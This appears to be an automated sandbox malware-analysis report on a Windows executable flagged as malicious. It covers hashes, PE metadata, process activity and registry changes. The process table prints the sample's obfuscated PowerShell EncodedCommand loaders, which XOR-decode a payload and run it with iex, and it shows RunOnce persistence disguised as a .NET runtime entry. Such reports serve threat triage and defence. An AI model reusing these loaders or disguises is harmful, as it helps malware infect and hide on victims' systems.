| File name: | yISNxCLqxR.2.exe |
| Full analysis: | https://app.any.run/tasks/eeef1af7-682b-4977-9e32-f9d9f35b1b03 |
| Verdict: | Malicious activity |
| Analysis date: | June 17, 2025, 22:28:00 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 10 sections |
| MD5: | AAFCEA70B0A39FB3CC168CF11AF8BACA |
| SHA1: | 95160E4B448633F71BD60F638E9E5563A9119311 |
| SHA256: | 598ADFA0841A3DF1B454F40625EA6354DDC86669C2969222A46BB2ADA040396C |
| SSDEEP: | 98304:DF0WSyluCuAQGaHd5vAv05nuk7dVaHzGiUjMljWfyHih2ZIdzw+/OD3WuXytptBQ:DFrSyHuAs19 |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:06:12 17:53:32+00:00 |
| ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, No debug |
| PEType: | PE32+ |
| LinkerVersion: | 2.44 |
| CodeSize: | 204800 |
| InitializedDataSize: | 3517952 |
| UninitializedDataSize: | 1024 |
| EntryPoint: | 0x13d0 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 5.2 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 728 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1328 | "powershell" -EncodedCommand JABlAGMAZwB6AGUAeABvAD0AJwBCADEAQQBFAEgAQQBVADgAWQBFAEEATgBjAFgATQAwAEMAMQBFAEEARABnAFUAcgBjADAATQA2AEMAbAAwAHUATQBRADAAWQBHAHoAdwBGAFMAVQBjAFIAZQBnAGcAQQBNAFEANAB5AFIAUQBRAEYAWgAwAEUAOABmAEUARQB5AE0AVgBBAEgARQB5AHcAcgBBAEgAQQA2AEMAdwBnADIAQwB6AFIAagBIAHkAOABYAGQAMQA4AEMAZQBnAGcATQBNAFMAVQBVAEQAVAB3AEYAYQAxAGcANwBWAEcAOAAzAEMAMQBFAEQARQB5AG8ASABaAHcAQQBCAEMAMABGAHoATQBWAEUANgBBAGcAUQArAGMAMQB3ADgAZgBsADQAbABHAEIAbwB5AE0AQwBrACsAUwBXAEkANwBDADIAOAA3AE0AVgBJAHUASABEAHcAVgBBAEUAUQA2AFYAVQBFAEEATQBTAHMAVQBNAFQAOABLAFkAMQB3AEEAZgBFAEUAMABDADEARQBRAEIAeQB3AHIAVQBsAG8AUgBlAGcAZwBWAEMARABzAGMASABTADgAVQBlAHcAVQA2AFUAbgA4ADQARwB5AEIAbgBMAEEAYwBGAEIARgA4ADYAQwBsADAAVwBOAGkAcwA2AEIAegB3AEIAYwAzADAANQBiAG0AcwBwAEMARABSAGkAUwBRAD0APQAnADsAJABnAGwAdgBtAHkAZAA9ACcAUgBjAFYAdABmAFIAMQA0AFgAOQA5AEIAJwA7ACQAcABpAG0AYQBkAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAYwBnAHoAZQB4AG8AKQA7ACQAcwByAHUAbQA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABwAGkAbQBhAGQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAcABpAG0AYQBkAFsAJABpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdACQAZwBsAHYAbQB5AGQAWwAkAGkAJQAkAGcAbAB2AG0AeQBkAC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAcgB1AG0AKQApAHwAaQBlAHgA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | yISNxCLqxR.2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2140 | "net" session | C:\Windows\System32\net.exe | — | yISNxCLqxR.2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2692 | "powershell" -EncodedCommand JABhAG0AYgBnAGIAPQAnAEIAbgBrAGgAVQBsAEUANgBmAHgAbwBhAEcAeQBnAHUAQwBuAGcAbABRAEYARQB0AGIAQgBrAHQAWQBBAFkAMABNAEMAUQA5AFYAVwBnAEQAVgBoADAARwBFAEYATQBhAE0AQwBjAFgAQwAxAEEARABlAEIAcwByAEYAaABvAG8ATQBIAGsAaQBYAFgAZwB0AEgAeQBvAHQAWQBWAE0AcwBDAGgAMQBHAFUAWABzAFIAYQBBAFUAVgBFAEYATQBXAE0AQQB3AHgAUQAyAGcARABkAEEASQBzAFAAagBRAHQAQwBuAGcAbQBYAFgANABCAGUARgBvAFcAWQBSAHAAcABNAEgAZwBmAFQARgBBADQAYgBBAFkAcgBGAEEAVQAvAEcAVABNAFgAZgBuADAANABWAGoAZwBzAFkAVABRAGgATQBIAHMATABVAG0AZwBUAEgAeAA0AHQAUAB4AG8AYQBNAEEASQB4AGYAMgBzAE0AZgBBAFkAWABGAGgAbwB1AEMAbgBnADEAUwBYAGcAdABUAFEAQQBHAEUARgBNAFAAQwBSAEkANQBVADMAcwBTAFoARgA4AHQATwBDAFEAaQBHAGcAbABDAFkAbABNAEQARwB3AFUAdABZAEEAWQBNAE4AdwBJAGYAUwBXAGcASABiAEMAYwB1AEIARABBAHoAQwBSADEASABCAHcAPQA9ACcAOwAkAGwAbwB2AGsAbwBwAD0AJwBTAEoAcwA6ADIAVAAuAG4ATwBTAGIAWAAnADsAJAB2AGsAZAB4AHcAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQBtAGIAZwBiACkAOwAkAGsAdQBkAGUAawB1AHIAawA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB2AGsAZAB4AHcALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAdgBrAGQAeAB3AFsAJABpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdACQAbABvAHYAawBvAHAAWwAkAGkAJQAkAGwAbwB2AGsAbwBwAC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGsAdQBkAGUAawB1AHIAawApACkAfABpAGUAeAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | yISNxCLqxR.2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2692 | "powershell" -EncodedCommand JABoAGkAYwBlAD0AJwBEAEIAYwA0AE0AaQB3AFYAUABoADAAKwBFAEUASQBJAEUAVwBFAHMAYwBpAHQAeABJAGsASQBWAEIAMABjADcASABBAGMAcwBkAGkAcwB2AEgAQgA0AFMAQgAwAGMAKwBKAFQAMABPAE0AaABGAHcASABGAGsAdQBBAHcAVQBhAEUARwBJAE8ATQBoAEkARgBTAFIAMABVAFoAQgA0AEUASABBAGQAWABkAHkAawBhAEkAaABzAHYAQQBCADEAWgBGAEcASQAwAGQAeABsAHgASgBsAGMAVQBPAFMAUQBhAEkAaABNAEYATgB3AFEAcABSAFUAWQBWAEEAeQBkAFkAQwBTAGsAdwBMAFIASQBGAEEARgBzACsARQBFAEkASQBGAEcASQAwAGQAdwBRAFUAUABrAFEAVwBFAHkAUQBFAEkAZwBjAGEASwB4AEkARQBJAGsAWQBVAFoAZwBFAEkASQBCAE0AZwBFAHgASQBWAEMARQBJAHUAWgB5AE0AYgBFAG0ASQBvAE4AaABJAFYAUABoADQAKwBGADAATQBwAEkAeABnAGcATAB5AG8AdgBJAG4AOABVAE8AVQBzAFkASABBAGcAbwBkAHkAMABSAE0AbgBzAHUARABEAHcAZABFAHgAYwBrAGQAeQBrAEIATQBWAG8AaABBADAAYwBmAEoAUQBnADAASwB3AGMANABBADAAVQB0AFoAaQBoAFoASABBAGMARwBOAFMAawB2AFIARQBrAG4AQgB6AEEAZwBIAEEAZwBCAE0AeAB4AHcATwBsADgAdABBAHoAeABmAEQAeABZAHMAYwBpAHQAeABJAGsASQBWAEIAMABjADgASAB3AGQAWABMAEMAcAB3AFEAQgBrADQATABTAEEAZABJAHgAZwBPAGQAUwAwAHIATQBSAGMAKwBGAHkAQQBhAEkAZwBjAGEATgBBAGMANABBADAAVQBVAFoAagBSAGMASQBoAGcAcgBJAEIAZwBSAE0AVQBVAFYATwBpAFEAYwBKAEIAUQBSAGMAQQBJAEYAUwBWADQAVgBPAFEAbwBDAEoAVwBJAEIASQBCAGcAUgBNAFUAVQBWAE8AaQBRAGMASgBCAFEAUgBjAEMAeAB3AEcARgA0AFYARQB5AGMASQBEAFIATQB3AEwAUgBJAEYAQQBGAHMANwBQAHoAdwBaAEkAZwBkAFgAZAB3AEUAQgBRAFUAQQBUAEYAegBNAFkARAB4AE4AVABMAHkAbwB2AEkAVQBrADcAQQAwAGMAWgBJAGgATQBqAEwAQwBsAHgARwBCAHMAVABPAGgAMABmAEQAeABnAFIAYwBBAEkASwBQAGsAWQBUAFoAeQBBAFcARAB4AFIAUwBJAEEASQBGAFAAawBVAFcATwBVAGMATgBEAEIAYwBHAEsAaQAwAHYASgBrAEEAVwBaAGcASQBhAEMAagB0AFgASwB5ADAASwBJAFUARQA2AEYAdwBVAEkARABCAGMAcwBMAEMAawB2AFIARgBzAG0AWgBrAHQAZQBKAEQANAB6AE4AeABBAFcAQQB4AGsAOQBFAHkAUQBDAEoAMgBNAGsAZABDADAASwBJAGgAMAArAEUARQBJAEkARgBHAEkAMABkAHcAUQBVAFAAawBRAFcARQB5AFEARQBJAGcAYwBhAEsAeABJAEUASQBrAFkAVQBaAGcARQBJAEMAZwBZAHcATAB5AHQAdwBCAEgAOAB1AEQAQwBBAEEARAB4AE0AdwBQAFIARQBhAEYAQgA0AFUAUABnAEYAWQBKAHcAYwA3AEkAQQBNAEIASQBrAEkAdABPAFEAWQBYAEkAbQBNAEsAZAB5AHcANwBSAFcAbwBWAFoAeQBRAGEASQBoAE0AagBNAHgASgB4AEkAVQBrADYARgB4AGsASQBJAHkAbwBSAEwAQwBsAHgARwBCAHMAVABPAGgAMABJAEYAZwBNAGoATABCAEkAVgBLAGwAdwBVAEQAQgBaAGIASQBoAGcARwBKAFEASQBGAEYARQBNAFMATwBTAFEAQgBKADIASQBTAE0AZwBRAHAAUgBVAEkAUwBIAEMATQBBAEMAeABNAFYASQBBAEkARgBKAGsATQBXAFoAegBSAGMASQB4AGcAdwBkAEEAUQBwAFAAbABnAFQAQQAwAGQAZgBEAFEAWgBTAGMAQQBjADcASQBsAGcAVwBBADAAYwBjAEgARAA0AHMASwBRAEUARwBRAEUAawBXAEEAeQBzAEkARABSAE0AdwBOAFMAMABLAEgAQgB3AFMAUABVAGMAcQBIAEEAZwBzAEwAUwBzAHYASABGAGsAVABFAHgANABaAEoARABrAEoASQBDADAANwBNAFUAVQBXAFoAeABwAGEASQBqADQATgBNAGgAbwBGAEoAbABRAHUAWgB6AGcAZgBKAFIAZwB3AE4AeQBwAHcAUgBFAGsAUgBCAHoAQQBEAEoAQgBnAHMASwB3AEUASwBBADAAawA5AGYAegBrAEkASQBSAE0AQgBJAEMANABXAEIAQgBjACsARQB5AFEAYwBKAFcASQAzAEkAQwAwADQAQQAwAFUAdQBaAGkAQQBlAEoARABrAGoAZgBnAEUAQgBJAGsAUQB0AEUAdwBJAGEARAB4AGcAVgBJAEIANQB3AEcARQBJAFUATwBTAGMAYgBFAG0ASQBvAE4AaABJAFYAUABoADQAKwBIAEEARQBJAEQAQgBaAGEASQBBAFEAVgBSAFUASQArAEYAeQBBAFYASAB3AGcARwBkAHkAcwByAE0AaABjADQAWgAwAEoAWQBJAEEAUQBXAE4AeABJAHIATQBVAEUAOQBFAHcAWgBiAEkAdwBnADQAYwBRAE0AUgBNAGgAawA0AEwAUwBBAGEASgBHAEoAWABLAFIASQBLAEcARgBrACsARQBFAEkASQBFAGoAMAAwAGQAQQBRAFUAUABrAFEAVwBFAHkAUQBFAEkAZwBjAGEASwB4AEkARQBJAGsAWQBVAFoAZwBZAHQASAAyAE0AdwBOAHkAcAB3AFIARQBrADcAQQBTAFIAYgBIAEEAYwBzAGQAaQB3AEYASgBVAGsAOQBaAEQAOQBaAEgAaABZADAAUABSAEkAYQBPAGwAUQB2AEUAegBRAEUASgBBAGMATwBNAGgAQQBIAE4AbABrAFUARQBTAEEASABJAGgAYwBrAEoAQgB3AEYAUwBVAFEAdQBBAHcAbwBNAEUAeABjAGsATABTAGwAdwBOAGsAQQB0AEQARAB3AE0ARQBnAGMATwBMAFMAcwB2AFMAVgBRAFYAWgBpAGgAZgBDAGoAdABYAEEAUgA0AEIAUgBXAEUAdQBEAEMAQQBmAEkAagAwADMATQBoAG8AcwBPAGsAWQBWAEEAeQBSAGMASgBHAE0AbwBOAFEAUQBvAE8AVgBzADYATwBFAG8AVwBJAG0ASQAwAE4AUwAwAFYATwBrAGMANgBQAGgAbwBHAEgAegA0AEcASwB4AEEARgBPAGwANABWAE8AQQBvAGcARgBBAFkAdwBDAEIARQBhAEkAbAA0AFQATwBTAFEAbwBKAFQAMABrAE0AeABJAGEARgBGAGcAVQBPAFEARQBhAEgAQQBnAEsASwB3AEkANABBAHgAawA5AEUAeABZAEYASgBCAGMAUwBkAEMAdwB2AEgARQBRACsARQBFAEkASQBFAGoAMAAwAGQAQQBRAFUAUABrAFEAVwBFAHkAUQBFAEkAZwBjAGEASwB4AEkARQBJAGsAWQBVAFoAZwBZADYASgBUADAATwBLAFIASgB3AEoAbABjACsARgAwAE0AdABJAGgAVQBhAE0AUgBKAHcAUwBWAHMANABMAGcARQBFAEgARwBJAHMATgBDAGsAcwBGAEIAdwBXAEEAegA4AGEARgBCAGMAMABOAEIARQBhAEcAMABrAG4AQgB6AE0AQgBFAHgAWQB6AFAAUQBVAEUAUABVAEEANABMAGcARQBFAEoAMgBJAEsAYwB4AEYAeABOAFUAawBuAEIAegBBAGcASABBAGcAQgBNAHgAMQB3AFAAawBFAHQAQQB5AEIAZQBKAEIAYwAwAEwAQgA0AEYATgBsAFEAVwBaAFMAQQBXAEoAdwBjAEcASwBSAEkAYQBPAFUAawA3AEEAVABSAGYARQAyAE0AdwBMAHkAcwBzAEkAaAA4AFUARQBBAEYAWQBEAEIAYwBXAEsAQwAwAEYAUABsAFkANwBQAHkAQQBEAEoAQgBjAGsAYwBnAEUARwBRAEUAawA5AFoAVABBADYAQwB3AFYAUwBLAFEAYwA0AEEAMABVAHUAQQAwAE0AZABKAFcASQBrAE4AeABFAFIATQBSAGMAKwBFAFUAYwBEAEkAaQBsAFQARQB4AEYAdwBHAEUASQB0AEgAQwBRAGMASABBAGMAdwBFAGgARQBhAFAAbAB3AGkASABEAGcAZgBKAEQAMABzAE4AeQBzAEYATgBsADAAKwBGADAATQA1AEoAVwBJADAAUABoAHMAVgBJAFUAawA5AEUAeQBnAGEASQBnAGMAcwBkAEEARQBCAFEAVwBNAFYAWgBoAFkAWgBKAEQAdwB3AGMAaQBzAEYASgBVAGsAawBBADAAZABmAEgAQQBnAG8ATAB4AEYAeABJAGwANABUAE8AUwBjAEkAQwBnAFkAbwBkAGkAbwBwAEMARQBJAFQATwBTAFEAYwBEAHgAVQBLAE4AeABKAHcARwBFAEkAVQBaAHkATgBZAEMAUwBrAHcAZABTAGsARgBCAEIAMAArAEUARQBJAEkARQBqADAAMABkAEEAUQBVAFAAawBRAFcARQB5AFEARQBJAGcAYwBhAEsAeABJAEUASQBrAFkAVQBaAGcAWQA3AEgAQQBnAHcAZAB5AGsAVgBSAFUAQQBVAFoAVAB3AEQASQBoAE0AagBNAHgAawBWAEMARgAwAFYAWgB4AFkANwBJAGgAYwBrAFAAaQB3AEgASABFAE0AagBaAGsAYwBzAEgAdwBnAHcAZAB4AEkAYQBPAGwANAB0AEQARAA4AEkAQwBnAFUAdwBNAFMAbwBzAEkAbgBvAFQARQAwAHMAWQBGAFEAYwA0AEQAeQBwAHcASABGAHMAdABaAEUAcwBhAEYAegAwAGsAZAB5AHcARgBKAGwAYwBXAEEAeQBRAFYARAB4AE4AVABFAHkAdwBGAE4AbABjAFQARQBoAFkAQQBIAEEAZABYAEIAUwB3AHYATgBsADQAVgBFAHoAUQBHAEoAQgBjADMASQBBAFEAWABHAEYANAB0AEUAeQBBAEQASgBEAG8AUgBjAEEASQBLAEsAawBFAFcAWgB4AEUAYQBGAEEAZwBLAEsAeABGAHgASgBoADQAVwBBADAAcwBhAEUAQgBjAE8ATQB4AEkAWABDAEYANABWAEEAeAA1AGYARAB4AFIAUwBJAEEASgB6AE0AbgBzADYARQBqADgAQgBDAFMAbwBSAEwAQwB3AHYARwBGAHcAVABMAFUAYwB0AEoAQgBjAGEATQBTAHgAeQBHAEUAWQBVAE8AUwBBADYASABBAGcAbwBNAHkAawBWAFIAVQBZAFQARQB5AGMASQBGAGcATQBqAEwAQgBJAHYATgBsADAAVQBaAGkAZABZAEMAUwBrAHcAZABTAGsARgBCAEIAMAA3AE8ARABnAEQASgBXAE0AdwBMAHkAcwBzAEkAbQBRAFYATwBpAEEARABKAFQANAA0AEwAeQBvAEIATQBSAGMAKwBGAHgAWQArAEUAQgBRAG4AZABoAHcAUgBFAHgAawA0AEwAUwBCAGQASgB4AGMAVwBkAEEAUQB1AE8AawBJAFUAWgB5AEEASABKAFQANAB3AEEAeQBwAHgASgBsAHMAVABGAHoATgBXAEQAeABRAG4ATQBBAGMANABBADAAVQBUAE8AUgBvAGQASQBpAGwAWABCAFMAbwBGAEMARgBnAFQAWgBDAEEARABKAEEAYwBrAE0AaABJAEUAUABoADQAdQBEAEQAaABmAEQAeABSAFMASQBBAEkARgBLAGsAWQBWAEgARAB3AEQAQwBTAG8AUgBMAEMAdwB2AEcARgB3AFQATABVAGMANwBJAGgAYwBrAFAAaQB3AEUARgBFAEUAdABBADAAYwB0AEkAagAwAGsATgB5AG8ARgBOAGsAYwBWAEUAeQBjAEkARgBnAE0AagBMAEMAdwBLAE8AaAA4AHQAQQBBAEYAWQBEAEIAZwA0AEsAQwBsAHgARQAxAHMAaABaAGoAUQBkAEgAQQBZAHcATQBSADAAcwBKAGwAcwArAEUARQBJAEkARABCAGcAdwBQAGkAdwBWAEoAUgBrADQATABTAEEAYgBKADIASQB3AGQAeQBvAEIATQBSAGMAKwBGAHoAcwBFAEQAUgBNAHcATgBTADAASwBIAEIAdwBTAFAAVQBjADYASAB3AGcAcwBOAFIAdwB2AE4AbABvAHQAQgB4AHcARwBLAFIAawBqAEwAZwBjADQAQgBCADQAVQBPAGgAawBJAEkAeQBvAFIATABCAEYAdwBHAEIAbwB0AEwAVABOAFcARAB4AFkAbwBLAHgASgB3AEgARgBRAFQARQB5AFEAVwBDAGcAWQBzAEwAUwBrAEYASgBrAFUAVABBAHcAbwBEAEgAQgBZAHcATAB5AHQAdwBBADAAawA3AEEAVABRAEYASQBoAGMATwBNAFMAbwByAE0AVQBVAFYATwBVAHMAYQBIAEcASQB3AGMAeQBzAEIATQBWAG8AaABIAEQAZwBmAEgARwBJAEcASwB5AHMAcgBNAG0AOAA4AEYAeQBBAEIASAAyAEkAYQBOAGkAeAB4AEsAbAA0AHUATABRAFUASQBEAEIAYwBXAEsAQwAwAEYAUABsAFkAOABCAHoATQBiAEUAeABnAG8ATgB5AG8AdgBQAGwANABVAEUAegBRAGMARAB4AE0AdwBMAHkAbwBWAEIARgBRAHUAQQB4ADQASABEAHgATgBUAEUAeABJAGEASQBoADQAVwBBADAAYwBCAEoAUwBrAGoATABDAHcAdgBHAEYAdwBUAEwAVABNAGIARQBCAGMAawBQAFMAbAB5AFIAVQBZAFYAQQB5AGMASQBEAEIAZABUAE4AUgBJAEsASQBsADAAKwBGADAATQA2AEgAdwBnAHMATgBSADAARgBOAGgANABXAEYAegBNAEUASgBXAEkAawBkAEMAdwBLAE8AVQBrADcAQQBTAEEARABKAFcASQBzAFAAaQBrAGEATQBoADQAVwBBADAAcwBhAEQAeABNAHcATQBTAGsAVgBSAFYAMAB0AE8AagB3AEIARAB4AE4AVABBAEMAcAB4AE8AawBRAHQAQQBBAEYAWQBKAHcAYwA3AEkAQQBNAEIASQBrAFEAVwBIAEIAbwBCAEQAUQBNAGcAYwBBAEUARgBKAGgAbwBXAEQAQwBNAEkAQwB4AE0AZwBmAGcARQBGAEoAbAAwAFUAWgBpAGMASQBJAHkAawBnAEsAeQAwAEYASABCADQAKwBFAEQAYwBJAEkAQQBRAFcAZgBnAEUARgBQAGsAWQBUAEUAegB3AEEARAB4AGcAUgBJAEIASQBhAEcARgA0AFQARgB6AE0AWABEAHgAaABTAGMAQwA0AFcAQgBFAEkAUwBFAHgANQBmAEQAeABRAG4AZQBnAD0APQAnADsAJABqAG4AeQBzAD0AJwBGAFAAYgBHAEgAQgBwAC4AdwBUAHIAbwAnADsAJABpAHMAZgBoAHIAawA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABoAGkAYwBlACkAOwAkAHkAZwBsAHIAcwB0AGUAcgA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABpAHMAZgBoAHIAawAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABpAHMAZgBoAHIAawBbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAGoAbgB5AHMAWwAkAGkAJQAkAGoAbgB5AHMALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAeQBnAGwAcgBzAHQAZQByACkAKQB8AGkAZQB4AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | yISNxCLqxR.2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3108 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3388 | C:\WINDOWS\system32\net1 session | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3632 | "C:\Users\admin\AppData\Local\Temp\yISNxCLqxR.2.exe" | C:\Users\admin\AppData\Local\Temp\yISNxCLqxR.2.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3640 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (3632) yISNxCLqxR.2.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
| Operation: | write | Name: | Uninstall 35.043.0178.0001 |
Value: C:\Users\admin\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_1wekyb1a8bbwe\data26\CoreRuntime.exe | |||
| (PID) Process: | (5564) yISNxCLqxR.2.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
| Operation: | write | Name: | Uninstall 35.043.0178.0001 |
Value: C:\Users\admin\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_1wekyb1a8bbwe\data26\CoreRuntime.exe | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1328 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xc0ujwf4.lss.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5504 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_diqf1p2w.rwt.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1328 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fkgsdutz.k10.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1328 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:D7A066420BA32B70A1344EED196C235B | SHA256:6617D4D450FCBABC6395BB82C93A43EEA13AE3F9F10DE0D5518293AB6BFD4127 | |||
| 2692 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vgbegcp1.4kn.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5564 | yISNxCLqxR.2.exe | C:\Users\admin\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_2wekybb28bbwe\bin\NETNativeFramework.exe | executable | |
MD5:FAD0D23BF3DC0F86CABC71BCD07B8835 | SHA256:C8F46C9BBF0FD12D9FDA4AFA2D84C445D13AD49198A5CE9EC5E0ADA8EDF7CE62 | |||
| 2692 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zfjk2cf1.dry.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5504 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gsjbgxmh.g0h.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2692 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_clcodmdx.ha5.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6472 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l0k1yqa4.rcs.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
